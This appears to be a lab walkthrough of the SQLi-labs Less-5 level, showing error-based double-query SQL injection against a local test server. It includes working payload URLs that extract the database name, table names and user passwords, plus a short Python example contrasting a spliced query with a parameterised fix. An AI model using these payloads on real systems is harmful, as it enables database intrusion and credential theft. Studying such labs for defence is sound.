Less-5

2018-09-28  This article has reached 26 readers  seeiy

0x01
First, keep changing the value of id. The largest working value is 14: once id exceeds 14, "You are in..." is no longer displayed. So a correct query returns "You are in...", while an incorrect one either produces an error or does not display "You are in...".

0x02
Try appending a single quote. An error is returned, so this is presumably a string-type injection like the one in Less-1.


0x03
Use order by num to find out how many columns can be displayed, which makes the later union select query easier. 3 works, while 4 gives an "out of range" error.
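To show why the quote probe (0x02) and the order by probe (0x03) behave as they do, here is an added example that is not part of the original post: a Python/SQLite stand-in for the Less-5 lookup (the real app is PHP/MySQL; the table shape id, username, password and the sample rows are assumptions), with the string-spliced query beside a parameterised one.

```python
import sqlite3

# Constructed sample rows standing in for the security.users table
# (assumed shape: id, username, password).
SAMPLE_USERS = [(1, "alice", "pw-one"), (2, "bob", "pw-two")]


def make_db():
    """In-memory SQLite stand-in for the MySQL database behind Less-5."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, id_param):
    """Less-5 style: the GET value is spliced straight into the quoted SQL string."""
    sql = f"SELECT * FROM users WHERE id='{id_param}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, id_param):
    """Fix: bind the value as a parameter, so it is only ever treated as data."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (id_param,)).fetchall()


def probe(lookup, conn, id_param):
    """Classify a request the way the walkthrough does: a row count, or an SQL error."""
    try:
        return "rows", len(lookup(conn, id_param))
    except sqlite3.Error as exc:
        return "error", str(exc)


if __name__ == "__main__":
    db = make_db()
    # The inputs from steps 0x01-0x03: a valid id, an out-of-range id,
    # a stray quote, and the ORDER BY column-count probes.
    for value in ["1", "99", "1'", "1' ORDER BY 3-- ", "1' ORDER BY 4-- "]:
        print(f"{value!r:22} vulnerable={probe(vulnerable_lookup, db, value)}"
              f"  hardened={probe(hardened_lookup, db, value)}")
```

The spliced query leaks a signal on every probe (error vs. row), which is exactly what the walkthrough relies on; the parameterised query answers every malformed input with zero rows and no error.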

0x04
This level is called "double-query GET single-quote string injection". Online write-ups describe double query as two nested selects.
Construct the payload: union select count(*),1, concat('',(payload),'', floor(rand()*2)) as a from information_schema.tables group by a --+

Query the database name:
http://192.168.88.130/sqllab/Less-5/?id=1' union select count(*),1, concat('~',(select database()),'~', floor(rand()*2)) as a from information_schema.tables group by a --+

Sometimes the result is not captured, because double query relies on the rand() function, which generates a random number, so the outcome is not deterministic.

0x05
Extract the table names.
payload: union select count(*),1, concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a --+

To extract all the table names, just change the number after limit:
union select count(*),1, concat('~',(select table_name from information_schema.tables where table_schema='security' limit 1,1),'~', floor(rand()*2)) as a from information_schema.tables group by a --+
Here we choose the users table.

0x06
Extract the column names of the users table.


limit 3 keeps returning "You are in...", so presumably all the column names have been enumerated.

0x07
Extract the data.
Query username:
http://192.168.88.130/sqllab/Less-5/?id=1'union select count(*),1, concat('~',(select username from users limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a --+

Query password:
http://192.168.88.130/sqllab/Less-5/?id=1'union select count(*),1, concat('~',(select password from users limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a --+